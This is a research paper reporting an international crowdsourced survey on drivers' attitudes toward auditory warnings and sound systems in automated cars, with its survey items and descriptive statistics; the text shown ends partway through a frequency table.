work_y6y774uctjetvarldheqeoenfy ---- Auditory interfaces in automated driving: an international survey Submitted 13 May 2015 Accepted 16 July 2015 Published 19 August 2015 Corresponding author Pavlo Bazilinskyy, p.bazilinskyy@tudelft.nl Academic editor Dan Stowell Additional Information and Declarations can be found on page 22 DOI 10.7717/peerj-cs.13 Copyright 2015 Bazilinskyy and De Winter Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Auditory interfaces in automated driving: an international survey Pavlo Bazilinskyy and Joost de Winter Department of Biomechanical Engineering, Faculty of Mechanical, Maritime and Materials Engineering, Delft University of Technology, Delft, The Netherlands ABSTRACT This study investigated peoples’ opinion on auditory interfaces in contemporary cars and their willingness to be exposed to auditory feedback in automated driving. We used an Internet-based survey to collect 1,205 responses from 91 countries. The respondents stated their attitudes towards two existing auditory driver assistance systems, a parking assistant (PA) and a forward collision warning system (FCWS), as well as towards a futuristic augmented sound system (FS) proposed for fully automated driving. The respondents were positive towards the PA and FCWS, and rated the willingness to have automated versions of these systems as 3.87 and 3.77, respectively (on a scale from 1 = disagree strongly to 5 = agree strongly). The re- spondents tolerated the FS (the mean willingness to use it was 3.00 on the same scale). The results showed that among the available response options, the female voice was the most preferred feedback type for takeover requests in highly automated driving, regardless of whether the respondents’ country was English speaking or not. The present results could be useful for designers of automated vehicles and other stakeholders. Subjects Human-Computer Interaction, Autonomous Systems, Multimedia Keywords Driverless car, Crowdsourcing, Survey, Questionnaire, Fully automated driving, Highly automated driving, Auditory interface, Auditory feedback, Warning INTRODUCTION The development of automated driving systems The development of automated driving technology is a key topic in modern transportation research. A transition to automated driving may have a large positive influence on society (European Commision, 2011). Each year more than 1,000,000 fatal accidents occur on roads worldwide, with the lower-income countries being overrepresented (Gururaj, 2008; World Health Organization, 2013). If automated driving systems are designed to be fully capable and reliable, a very large portion of—yet probably not all—road traffic accidents could be prevented (Goodall, 2014). Furthermore, traffic congestions, gas emissions, and fuel consumption may reduce considerably thanks to automated driving systems. The control of vehicles can be represented as a spectrum consisting of five levels: (1) manual driving, (2) driver assistance, (3) partially automated driving, (4) highly automated driving, and (5) fully automated driving (Gasser & Westhoff, 2012). The in- troduction of driver assistance systems to the public took place in the 1990s with the release How to cite this article Bazilinskyy and De Winter (2015), Auditory interfaces in automated driving: an international survey. PeerJ Comput. Sci. 1:e13; DOI 10.7717/peerj-cs.13 mailto:p.bazilinskyy@tudelft.nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.13 http://dx.doi.org/10.7717/peerj-cs.13 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 of Adaptive Cruise Control (ACC), a system that automates the longitudinal motion of the vehicle (Beiker, 2012). Advancements in cameras, radars, lasers, and artificial intelligence have led to the creation of systems that make partially automated driving possible. Partially automated driving systems not only control the longitudinal motion of a vehicle, but also its lateral motion. Examples of such systems are BMW’s Traffic Jam Assistant (BMW, 2013), Volvo’s ACC with steer assist (Volvo, 2013a), and Mercedes’ Distronic Plus with Steering Assist (Daimler, 2013). In partially automated driving, drivers are usually required to keep their eyes focused on the road and intermittently touch the steering wheel. Highly automated driving (HAD) is a next step. In HAD, the human can release the hands from the steering wheel and is no longer required to monitor the road permanently (e.g., Banks, Stanton & Harvey, 2014). However, humans still have an important role in the control of highly automated vehicles (Alicandri & Moyer, 1992; Dingus, Hulse & Barfield, 1998; Levitan, Golembiewski & Bloomfield, 1998). In HAD, drivers can be asked to take over control of the vehicle when required, for example, when the vehicle automation cannot solve a task in a demanding traffic environment. The time between issuing a ‘takeover request’ and the required moment of transition of control from the vehicle to the human is a critical design parameter (Gold et al., 2013). If the driver spends too much time on reclaiming the control of the vehicle, or if the driver does not comprehend the warning signal sent by the vehicle, an accident may result. Clearly, the design of appropriate feedback is essential for the successful introduction of HAD to the public roads. Indeed, inappropriate feedback is regarded as a primary cause of automation-induced accidents (Norman, 1990). Fully automated driving (FAD) will be the next and final iteration in automated driving. People have been envisioning this step in the development of transportation for a long time. Almost half a millennium ago, Leonardo Da Vinci envisioned a pre-programmed clockwork cart (Weber, 2014). In 1939 during the New York World’s Fair, General Motors presented their vision of the world 20 years into the future (1959–1960). In their Futurama exhibition, they introduced a concept of automated highways with trench-like lanes for separating traffic (Wetmore, 2003). In 1953, the futurist Isaac Asimov wrote a short story ‘Sally’ that pictured a situation where only cars that did not require a human driver were allowed on the roads. FAD offers numerous potential benefits. It could reduce stress and allow the operator to engage in non-driving tasks such as working, using in-vehicle entertainment, or resting (e.g., Jamson et al., 2011; Llaneras, Salinger & Green, 2013). Furthermore, FAD is a recommended solution for achieving an optimal traffic flow, for example by means of platooning on highways (Bergenhem et al., 2012; Varaiya, 1993). The Google Driverless Car is one of the existing prototypes of FAD (Markoff, 2010). However, this particular vehicle does not fully comply with the principles of FAD; in reality, the Google Driverless Car relies on accurate three-dimensional maps of the environment and currently cannot cope with all dynamic environments of high complexity. It requires considerable advances in sensing and artificial intelligence before FAD becomes practically feasible on all public roads. Continental, a leading German manufacturer specialising on components for automotive Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 2/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 industry, predicts that FAD will be launched in the year 2025 (Continental, 2012), whereas some voices have argued that FAD will never happen (Gomes, 2014; Underwood, 2014; Yoshida, 2014). Although automated driving systems are expected to improve safety, certain side effects may occur regarding the human factor (e.g., Bainbridge, 1983; Desmond, Hancock & Monette, 1998; Merat et al., 2012; Brandenburg & Skottke, 2014). A degraded reaction time to critical events has been found among drivers exposed to ACC (Stanton, Young & McCaulder, 1997; Stanton et al., 2001; Rudin-Brown & Parker, 2004; Larsson, Kircher & Hultgren, 2014), and this issue is likely to be aggravated in higher levels of automated driving (De Winter et al., 2014; Strand et al., 2014). Furthermore, it is expected that people who will be driving highly and fully automated cars will suffer from a reduction of their manual control skills, similar to pilots in highly automated airplanes (Ebbatson, 2009; Scallen, Hancock & Duley, 1995). The development of effective feedback systems is considered important in supporting operator’s sustained attention, also called vigilance (Heikoop et al., submitted for publication). Auditory displays As mentioned above, unless the driving task is fully automated, an appropriate feedback system is required that warns and/or informs the human when automation mode changes are required. The present study investigated the potential of auditory feedback in automated driving. The auditory modality has several important characteristics: (1) it is omnidirectional. That is, unlike visual cues, auditory cues can be received from any direction. This is especially important in automated driving, during which the driver may not be attending to the road and dashboard; (2) the auditory sense can receive information at almost all times; (3) sound is transient, that is, unlike visual information which can be continuously available, information passed in the form of sound is only available at that particular moment; (4) although auditory cues may be masked by other sounds, humans have the ability to selectively focus on one sound when multiple streams of sound are available, also known as the cocktail party effect (Bregman, 1990; Cooke & Ellis, 2001; Hermann, Hunt & Neuhoff, 2011; Wickens & Hollands, 2013). An advantage of sound is that it is possible to use language, which may be more informative as compared to the information conveyed with haptic or visual interfaces. Because of the aforementioned qualities of sound, auditory displays are used in a variety of applications, especially in those cases where the user needs to be alerted or where additional visual load has to be avoided. For example, the majority of present route navigation devices use voice and sound messages to give directions to their users (Holland, Morse & Gedenryd, 2002), and flight crews use auditory signals to get informed about proximate aircraft or to obtain directional information (e.g., Begault, 1993; Bronkhorst, Veltman & Van Breda, 1996). An auditory interface in combination with tactile feedback was suggested in a driving simulator study (Ho, Reed & Spence, 2007) as an optimal warning system for collision avoidance. The auditory modality has potential not only as a warning method, but also for providing input to the machine (e.g., speech interfaces). Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 3/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 Literature reviews (Stanton & Edworthy, 1999; Barón & Green, 2006) suggest that people drive ‘better’ (i.e., lower lane variation, steadier speed) when auditory interfaces are employed in a manually driven car. Auditory feedback can be delivered as a pre-recorded voice or as an artificial sound warning/message. The term earcon refers to a brief auditory message (e.g., a tune or a sound of a bell) that represents a certain event or object. Earcons have been introduced to desktop computers to complement visual icons (Mynatt, 1990; Belz, Robinson & Casali, 1999; Hermann, Hunt & Neuhoff, 2011). Previous research has shown that a female voice is favoured over a male voice in route navigation devices (Large & Burnett, 2013). However, national or cultural differences seem to exist, where in some cases, the male voice is preferred over the female voice. In 2010, BMW supposedly had to recall its navigating system in Germany because male drivers disliked the idea of following orders communicated via a female voice (Takayama & Nass, 2008), and Apple recently added the option of a male voice to their voice control system Siri (Bosker, 2013). In a driving simulator study by Jonsson & Dahlbäck (2011), non-native speakers of English responded more accurately to route instructions provided by a female voice than to route instructions provided by a male voice. Auditory systems in current vehicles: parking assistant and forward collision warning system Modern vehicles often include systems that assist in driving and increase road safety. Such systems support drivers by providing auditory/visual/haptic warning messages and by taking over control of some of the driving tasks. In the present survey, we investigated the opinion of people on two existing auditory systems: a parking assistant (PA) and a forward collision warning system (FCWS). The first generations of PAs were so-called parking sensors, which produce warning sounds (beeps) when the car gets too close to a nearby object while parking, using ultrasonic or electromagnetic sensors (BMW, 2013; Toyota, 2014; Volkswagen, 2014). Some recent PA systems take over the positioning of the vehicle during parking, leaving the control of acceleration and deceleration to the driver (Volkswagen, 2014). Other PAs take over control of the parking process entirely, as can be seen in the Toyota Prius 2015 and BMW X5 (BMW, 2014; Toyota, 2014). A FCWS is a system that provides a warning sound when a vehicle is rapidly approach- ing a vehicle in front. FCWSs have the potential to prevent a large portion of rear-end collisions (Jamson, Lai & Carsten, 2008; Kingsley, 2009; Kessler et al., 2012). If a potential accident is detected by the FCWS, the system either gives a warning to the driver (Honda, 2014) or engages in emergency braking and/or steers way from the object (Volvo, 2013b). Most FCWS detect vehicles with the help of computer vision (Srinivasa, 2002; Dagan et al., 2004), an approach that is used by companies like Honda and BMW (BMW, 2013; Volvo, 2013b; Honda, 2014) and/or radars (Volvo, 2013b; Ford, 2014; Honda, 2014; Mercedes-Benz, 2014). Both approaches have limitations, and the system may not issue warnings or stop the vehicle in bad weather or in other situations where the sensors are obscured by external Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 4/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 factors. The introduction of vehicle-to-vehicle (V2V) communication may increase the efficiency and capabilities of collision warning systems (e.g., Miller & Huang, 2002). Eighty-eight percent of owners of Volvo cars surveyed by Braitman et al. (2010) reported always having the FCWS turned on. It is expected that both PAs and FCWSs will remain in future partially and highly auto- mated vehicles. However, these technologies will become obsolete with the introduction of FAD because both parking and collision avoidance will be handled without any input from the human driver. ‘Augmented/spatial’ sound system for fully automated driving Auditory warning signals will not be required in FAD, because in FAD the automation by definition takes care of all possible emergency conditions. This study proposes an experimental setup aimed at the three-dimensional augmentation of sound surrounding a vehicle, hereafter referred to as the ‘future system’ (FS), which could be used in FAD for entertainment and comfort. Three-dimensional sound is being developed as a means for providing feedback to humans (Lumbreras, Sánchez & Barcia, 1996; Garas, 2000; Rozier, 2000; Godinho, António & Tadeu, 2001; Dobler, Haller & Stampfl, 2002). Our proposed FS filters out unwanted sounds (e.g., tire/engine noise coming from vehicles in the vicinity) and amplifies desired sounds (e.g., sound of birds singing in a park). We envision that such a system could be used in future fully automated vehicles. Vehicles driving fully automatically have full control of the vehicle and must have reliable detection capabilities of the environment. Drivers of such vehicles will not be required to pay attention to the processes that take place in the environment surrounding the car. Hence, a spatial augmentation of sounds that a driver prefers to hear and simultaneous cancelation of unwanted sounds may enhance the pleasure of being engaged in FAD. Such system will probably have to be configurable: drivers must have the option to select which sounds they want to augment and which sounds they wish to filter out, as well as to adjust the volume of these sounds. The aim of the present survey study As mentioned above, feedback is important in HAD, especially regarding transitions of control. It is relevant for the development of automated driving systems to know what types of interfaces people want and need. Because automated cars do not exist yet on the consumer market, it is impossible to test such research questions in an ecologically valid environment, except through driving simulator research. The present study was undertaken from a different point of view. We proceeded on the basis that respondents were asked to imagine automated driving scenarios. The aim of the present study was to investigate the opinion of people on two existing auditory displays (PA & FCWS) as well as the augmented sound system ‘FS’. The respondents were asked to judge two qualities of the systems—helpfulness and annoyance—and state whether they would consider using automated versions of such systems in the future. In addition, we asked people to report their preferred type of feedback for takeover requests in HAD. Statistical associations between self-reported driving style as measured with the Driver Behaviour Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 5/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 Questionnaire (DBQ), yearly mileage, number of accidents, and opinions of respondents on the qualities of the proposed systems were assessed. The hypothesis that people from non-English speaking countries prefer a female voice to a male voice in automated driving systems was also tested. Additionally, the respondents were asked to provide their general thoughts on the concept of automated driving in a free-response question. Finally, the respondents provided their opinion on the year of introduction of fully automated driving in their country of residence. Results of these analyses were compared with findings from two previous surveys that asked questions related to other aspects of automated vehicles (De Winter et al., 2015; Kyriakidis, Happee & De Winter, 2015). METHODS Survey A survey containing 31 questions was developed with the online tool CrowdFlower (www. crowdflower.com). Table 1 shows the questions of the survey as well as the corresponding coding. The full survey is included in the Supplemental Information 1. The survey was targeted towards reasonably educated persons without knowledge of automated driving. A previous survey indicated that people who work on CrowdFlower-based surveys have mostly undergraduate degrees (Kyriakidis, Happee & De Winter, 2015). The present survey introduced in plain language three levels of driving: manual driving, partially automated driving, and fully automated driving. Manual driving was referred to as “normal (non automated) cars”. The explanation of partially driving was provided as follows: “Imagine again that you are driving in an automated car (that can perform certain tasks without any interaction from the humans in the car). However, the automation cannot handle all possible situations, and you sometimes have to take over control”. Respondents were asked to imagine fully automated driving as follows: “Imagine a fully automated car (no steering wheel) that drives completely on its own with no manual interaction”. The survey contained questions on the person’s age, gender, driving frequency, mileage, and accident involvement. The questions asking participants to provide information on their driving style were based on the violations scale of the DBQ, as used by De Winter (2013). The respondents were asked to express their opinion on two currently existing systems and one proposed setup that could be used during fully automated driving. Specifically, we asked respondents about (1) a parking assistant (PA) in a manually driven car that produces warning sounds (beeps) when the car gets too close to a nearby object while parking, (2) a forward collision warning system (FCWS) in a manually driven car that provides a warning sound when a car is rapidly approaching another car in front, and (3) a future augmented surround sound system in a fully automated vehicle (FS). The FS was described as follows: “Now imagine that this fully automated car records what is happening outside and plays it via speakers inside the car, informing the occupants about the outside environment. In other words, those who sit in the car can hear what is happening outside Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 6/28 https://peerj.com/computer-science/ http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://www.crowdflower.com http://dx.doi.org/10.7717/peerj-cs.13/supp-1 http://dx.doi.org/10.7717/peerj-cs.13/supp-1 http://dx.doi.org/10.7717/peerj-cs.13/supp-1 http://dx.doi.org/10.7717/peerj-cs.13 Table 1 All survey items. Variable Question Full question as reported in the survey Used coding Instr Q1 Have you read and understood the above instructions? 1 = Yes, 2 = No Gender Q2 What is your gender? (1 = female, 2 = male) −1 = I prefer not to respond, 1 = Female, 2 = Male Age Q3 What is your age? Positive integer value DriveFreq Q4 On average, how often did you drive a vehicle in the last 12 months? −1 = I prefer not to respond, 1 = Never, 2 = Less than once a month, 3 = Once a month to once a week, 4 = 1 to 3 days a week, 5 = 4 to 6 days a week, 6 = Every day KmYear Q5 About how many kilometres (miles) did you drive in the last 12 months? −1 = I prefer not to respond, 1 = 0, 2 = 1–1,000, 3 = 1,001–5,000, 4 = 5,001–15,000, 5 = 15,001–20,000, 6 = 20,001–25,000, 7 = 25,001–35,000, 8 = 35,001–50,000, 9 = 50,001–100,000, 10 = more than 100,000 NrAcc Q6 How many accidents were you involved in when driving a car in the last 3 years? (please include all accidents, regardless of how they were caused, how slight they were, or where they happened)? −1 = I prefer not to respond, 1 = 0, 2 = 1, 3 = 2, 4 = 3, 5 = 4, 6 = 5, 7 = More than 5 Vangered Q7 How often do you do the following?: Becoming angered by a particular type of driver, and indicate your hostility by whatever means you can. −1 = I prefer not to respond, 1 = 0 times per month, 2 = 1 to 3 times per month, 3 = 4 to 6 times per month, 4 = 7 to 9 times per month, 5 = 10 or more times per month Vmotorway Q8 How often do you do the following? Disregard- ing the speed limit on a motorway. −1 = I prefer not to respond, 1 = 0 times per month, 2 = 1 to 3 times per month, 3 = 4 to 6 times per month, 4 = 7 to 9 times per month, 5 = 10 or more times per month Vresident Q9 How often do you do the following? Disregard- ing the speed limit on a residential road. −1 = I prefer not to respond, 1 = 0 times per month, 2 = 1 to 3 times per month, 3 = 4 to 6 times per month, 4 = 7 to 9 times per month, 5 = 10 or more times per month Vfollowing Q10 How often do you do the following? Driving so close to the car in front that it would be difficult to stop in an emergency. −1 = I prefer not to respond, 1 = 0 times per month, 2 = 1 to 3 times per month, 3 = 4 to 6 times per month, 4 = 7 to 9 times per month, 5 = 10 or more times per month Vrace Q11 How often do you do the following? Racing away from traffic lights with the intention of beating the driver next to you. −1 = I prefer not to respond, 1 = 0 times per month, 2 = 1 to 3 times per month, 3 = 4 to 6 times per month, 4 = 7 to 9 times per month, 5 = 10 or more times per month (continued on next page) Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 7/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 Table 1 (continued) Variable Question Full question as reported in the survey Used coding Vhorn Q12 How often do you do the following? Sounding your horn to indicate your annoyance with another road user. −1 = I prefer not to respond, 1 = 0 times per month, 2 = 1 to 3 times per month, 3 = 4 to 6 times per month, 4 = 7 to 9 times per month, 5 = 10 or more times per month Vphone Q13 How often do you do the following? Using a mobile phone without a hands free kit. −1 = I prefer not to respond, 1 = 0 times per month, 2 = 1 to 3 times per month, 3 = 4 to 6 times per month, 4 = 7 to 9 times per month, 5 = 10 or more times per month Vmean N/A Mean for Q7–12 Numeric value PApast Q14 In the past month, did you drive a car with a parking assistant? −1 = I prefer not to respond, 1 = I do not know, 2 = No, 3 = Yes PAhelp Q15 A parking assistant is helpful. −1 = I prefer not to respond, 1 = Disagree strongly, 2 = Disagree a little, 3 = Neither agree nor disagree, 4 = Agree a little, 5 = Agree strongly PAannoy Q16 A parking assistant is annoying. −1 = I prefer not to respond, 1 = Disagree strongly, 2 = Disagree a little, 3 = Neither agree nor disagree, 4 = Agree a little, 5 = Agree strongly PAopin Q17 What do you think are the disadvantages of a parking assistant? Textual response PAfut Q18 I would like to have a system in my car that can park the car automatically, just by pressing a button. −1 = I prefer not to respond, 1 = Disagree strongly, 2 = Disagree a little, 3 = Neither agree nor disagree, 4 = Agree a little, 5 = Agree strongly FCWSpast Q19 In the past month, did you drive a car with a forward collision warning system? −1 = I prefer not to respond, 1 = I do not know, 2 = No, 3 = Yes FCWShelp Q20 A forward collision warning system is helpful. −1 = I prefer not to respond, 1 = Disagree strongly, 2 = Disagree a little, 3 = Neither agree nor disagree, 4 = Agree a little, 5 = Agree strongly FCWSannoy Q21 A forward collision warning system is annoying. −1 = I prefer not to respond, 1 = Disagree strongly, 2 = Disagree a little, 3 = Neither agree nor disagree, 4 = Agree a little, 5 = Agree strongly FCWSfut Q22 I would you like to have a system in my car that brakes automatically to avoid collisions (Autonomous Emergency Braking). −1 = I prefer not to respond, 1 = Disagree strongly, 2 = Disagree a little, 3 = Neither agree nor disagree, 4 = Agree a little, 5 = Agree strongly FCWSopin Q23 What do you think are the disadvantages of a forward collision warning system? Textual response FSannoy Q24 I believe that this type of surround sound system would be annoying. −1 = I prefer not to respond, 1 = Disagree strongly, 2 = Disagree a little, 3 = Neither agree nor disagree, 4 = Agree a little, 5 = Agree strongly (continued on next page) Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 8/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 Table 1 (continued) Variable Question Full question as reported in the survey Used coding FSfut Q25 I would prefer to use such a sound system instead of opening the window, when driving through a scenic place (for example, a national park). −1 = I prefer not to respond, 1 = Disagree strongly, 2 = Disagree a little, 3 = Neither agree nor disagree, 4 = Agree a little, 5 = Agree strongly FSopin Q26 What would be the advantages and the disad- vantages of such sound system? Textual response TORint Q27 Now imagine again that you are driving in an automated car (that can perform certain tasks without any interaction from the humans in the car). However, the automation cannot handle all possible situations, and you sometimes have to take over control. What type of warning signal would you like to receive in case manual take over is required? 1 = Warning sound: one beep, 2 = Warning sound: two beeps, 3 = Warning sound: horn sound, 4 = Warning sound: bell sound, 5 = Warning light, 6 = Visual warning message projected on windscreen ‘Take over please’, 7 = Vibrations in your seat, 8 = Vibrations in your steering wheel, 9 = Vibrations in your seatbelt, 10 = Vibrations in the floor, 11 = Female voice: ‘Take over please’, 12 = Male voice: ‘Take over please’, 13 = Other, 14 = None of the above TORintot Q28 If you answered ‘Other’ in the previous question, please specify what type of warning signal you would like to receive in the described scenario. Textual response FACpref Q29 I would prefer to drive in a fully automated car rather than a normal (non automated) car. −1 = I prefer not to respond, 1 = Disagree strongly, 2 = Disagree a little, 3 = Neither agree nor disagree, 4 = Agree a little, 5 = Agree strongly YearAuto Q30 In which year do you think that most cars will be able to drive fully automatically in your country of residence? Year Comm Q31 Please provide any suggestions which could help engineers to build safe and enjoyable automated cars. Textual response SurvTime Survey time (derived from results generated by CrowdFlower) Seconds even when their windows are closed. Sound volume in such system could be adjusted; particular noise (for example sound coming from another vehicle) could be filtered out. Such a system could, for example, be used during a leisure drive through a park on a hot day”. Illustrations belonging to the three scenarios (i.e., PA, FCWS, FS) were used in the survey (Fig. 1). No auditory examples were used. The illustrations were uploaded to a remote site in order to be embedded to the survey. Supplemental Information 1 contains the XML code used to create the survey. If one wishes to add images to a CrowdFlower survey, the suggested method could be used. The respondents were asked to indicate disadvantages of the PA (Q17) and FCWS (Q23) and to indicate advantages and disadvantages of the FS (Q26) by means of textual Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 9/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13/supp-1 http://dx.doi.org/10.7717/peerj-cs.13/supp-1 http://dx.doi.org/10.7717/peerj-cs.13/supp-1 http://dx.doi.org/10.7717/peerj-cs.13 Figure 1 Illustrations belonging to the three scenarios presented to the respondents. (A) Parking assistant (PA); (B) Forward collision warning system (FCWS); (C) Future system (FS). responses. The respondents also had the opportunity to indicate the preferred mode of feedback for receiving a takeover request (Q27 & Q28). In the last question (Q31), they were asked to “provide any suggestions, which could help engineers to build safe and enjoyable automated cars”. Giving a response to this last free-response question was optional. All examples of given comments shown in this article are direct quotes from the responses; no grammatical or syntactic errors were corrected. The respondents had to complete all questions (except Q28 & Q31), and each question had an I prefer not to respond response option. Configuration of CrowdFlower In the instructions, the respondents were informed that they would need approximately 10 min to complete the survey. The task expiration time was set to 30 min. Contributors from all countries were allowed to participate in the survey, in order to collect data from an as large and diverse population as possible. Moreover, the lowest level of experience of contributors, ‘Level 1 contributors’, was selected. This level of experience accounts for 60% of completed work on CrowdFlower. As a result, the survey was available to a large number of workers, which allowed reaching a relatively diverse group of users of the platform. Completing the survey more than once from the same IP address was allowed (note, however, that multiple responses from the same IP address were filtered out in our analyses, see results section). For the completion of the survey a payment of $0.15 was offered, and 2,000 responses were collected. The study was preceded by a pilot test with 10 respondents. The pilot test did not lead to any changes in the survey, and these 10 respondents were not included in the analysis. Analyses Descriptive statistics (i.e., mean, median, standard deviation, skewness, and number of responses) were calculated for each of the variables. The skewness was calculated as the third central moment divided by the cube of the standard deviation. A Spearman correlation matrix among the variables was created. The first author manually performed the analysis of textual responses (Q17, Q23, Q26, Q28, & Q31). CrowdFlower automatically provides the respondent’s country based on his/her IP address. We analysed the preferences of people from English speaking countries, as defined by the UK government (UK Visas & Immigration, 2014: Antigua and Barbuda, Australia, Bahamas, Barbados, Belize, Canada, Dominica, Grenada, Ireland, Jamaica, New Zealand, Saint Lucia, Trinidad and Tobago, United Kingdom, and the United States) versus Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 10/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 non-English speaking countries regarding the use of a male or female voice for supporting takeover requests during highly automated driving. Supplemental Information 1 contains the MATLAB script used to analyse the data. Ethics statement All data were collected anonymously. The research was approved by the Human Research Ethics Committee (HREC) of the Delft University of Technology. Documented informed consent was obtained via a dedicated survey item asking whether the respondent had read and understood the survey instructions. RESULTS Number of respondents and respondent satisfaction In total, 2,000 surveys were completed. The responses were gathered on 2 September 2014 between 15:00 and 20:15 (CET). The survey received an overall satisfaction rating of 4.4 out of 5.0. Additionally, the respondents ranked clearness of the instructions as 4.4/5.0, fairness of the questions as 4.2/5.0, easiness of the survey as 4.2/5.0, and the offered payment as 4.1/5.0. Data filtering The respondents who indicated they had not read the instructions (N = 10), who indicated they were under 18 and thereby did not adhere to the survey instructions (N = 6), who chose the I prefer not to respond or I do not know options in one or more of the multiple choice questions (N = 231), who indicated they never drive (N = 193), or who indicated they drive 0 km per year (N = 191) were excluded from the analyses. Since no limitations were applied on the number of responses that could be generated per IP address, some people completed the survey more than once. Such behaviour was seen as an indication that these persons participated in the survey primarily because of monetary gain. Thus, we applied a strict filter, and all data generated from non-unique IP addresses were removed (N = 465). In total, 795 surveys were removed, leaving 1,205 completed surveys for further analysis. For the question “In which year do you think that most cars will be able to drive fully automatically in your country of residence?”, non-numeric responses (e.g., a year complemented by words such as “maybe 2030”, or “never”) and answers before the year 2014 were excluded, leaving 1,082 numeric responses. Analyses at the individual level The 1,205 respondents were from 91 countries (all 2,000 responses were associated with 95 countries). Descriptive statistics for all variables are listed in Table 2. The respondents took on average 9.2 min to complete the survey (SD = 5.6 min, median = 7.7 min). The Supplemental Information 1 contains the entire Spearman correlation matrix. The correlation coefficients between variables that related to questions about the PA, FCWS, and FS (PApast, PAhelp, PAannoy, PAfut, FCWSpast, FCWShelp, FCWSannoy, FCWSfut, FSannoy, & FSfut) on the one hand, and Age, DriveFreq, KmYear, NrAcc, the Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 11/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13/supp-1 http://dx.doi.org/10.7717/peerj-cs.13/supp-1 http://dx.doi.org/10.7717/peerj-cs.13/supp-1 http://dx.doi.org/10.7717/peerj-cs.13/supp-1 http://dx.doi.org/10.7717/peerj-cs.13/supp-1 http://dx.doi.org/10.7717/peerj-cs.13/supp-1 http://dx.doi.org/10.7717/peerj-cs.13 Table 2 Descriptive statistics for the survey items (N = 1,205). The response option “I don’t know” was omitted for the variables PApast and FCWSpast. Variable Mean Median SD Skewness Min Max Gender 1.75 2 0.43 −1.17 1 2 Age 31.94 30 10.49 1.04 18 73 DriveFreq 4.72 5 1.21 −0.66 2 6 KmYear 4.09 4 1.78 0.92 2 10 NrAcc 1.47 1 0.94 2.88 1 7 Vangered 1.86 2 0.86 1.46 1 5 Vmotorway 1.85 2 1.05 1.54 1 5 Vresident 1.70 1 1.01 1.79 1 5 Vfollowing 1.45 1 0.77 2.07 1 5 Vrace 1.32 1 0.69 2.62 1 5 Vhorn 1.86 2 1 1.41 1 5 Vphone 1.64 1 1.01 1.84 1 5 Vmean 1.67 1.57 0.57 1.36 1 4.71 PApast 2.27 2 0.45 1.03 2 3 PAhelp 4.33 5 0.88 −1.38 1 5 PAannoy 2.35 2 1.18 0.39 1 5 PAfut 3.87 4 1.24 −0.93 1 5 FCWSpast 2.10 2 0.30 2.65 2 3 FCWShelp 4.11 4 1.04 −1.14 1 5 FCWSannoy 2.56 3 1.26 0.27 1 5 FCWSfut 3.77 4 1.22 −0.80 1 5 FSannoy 3.21 3 1.22 −0.18 1 5 FSfut 3.00 3 1.29 −0.09 1 5 FACpref 3.01 3 1.33 −0.05 1 5 YearAuto 2,078.33 2,030 713.77 30.73 2,014 25,000 SurvTime 553.95 462 338.41 1.34 58 1,810 DBQ variables (Vangered, Vmotorway, Vresident, Vfollowing, Vrace, Vhorn, & Vphone), YearAuto, and SurvTime, on the other, were overall small, between −0.15 and 0.25. The respondents’ mean and median age were 31.9 and 30 years, respectively. Figure 2 shows the distribution of the respondents in 5-year wide age groups. 75.2% of the respondents were male (906 men vs. 299 women). The frequencies of the answers are provided in Table 3. Figure 3 shows that the respondents expected most cars to be able to drive in fully automated mode in their countries of residence around 2,030 (median response), with a highly skewed distribution. The respondents were asked to provide their opinion on two characteristics of the PA and FCWS systems, annoyance and helpfulness, and whether they would be willing to have automated versions of such systems in their own cars (Q18 for the PA & Q22 for the FCWS), all questions on a scale from 1 (disagree strongly) to 5 (agree strongly). Figure 4 shows the results for these questions. Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 12/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.13 Table 3 Frequencies of answers. Variable 1 2 3 4 5 6 7 8 9 10 Gender 299 906 DriveFreq 0 79 108 293 313 412 KmYear 0 250 245 337 148 76 77 49 16 7 NrAcc 855 226 79 19 13 6 7 Vangered 417 629 96 33 30 Vmotorway 541 466 97 39 62 Vresident 663 379 78 32 53 Vfollowing 807 295 70 20 13 Vrace 939 182 60 15 9 Vhorn 513 480 123 44 45 Vphone 730 304 89 34 48 PApast 17 865 323 PAhelp 14 39 134 367 651 PAannoy 383 297 290 196 39 PAfut 86 109 175 338 497 FCWSpast 28 1,058 119 FCWShelp 34 68 178 373 552 FCWSannoy 331 254 324 208 88 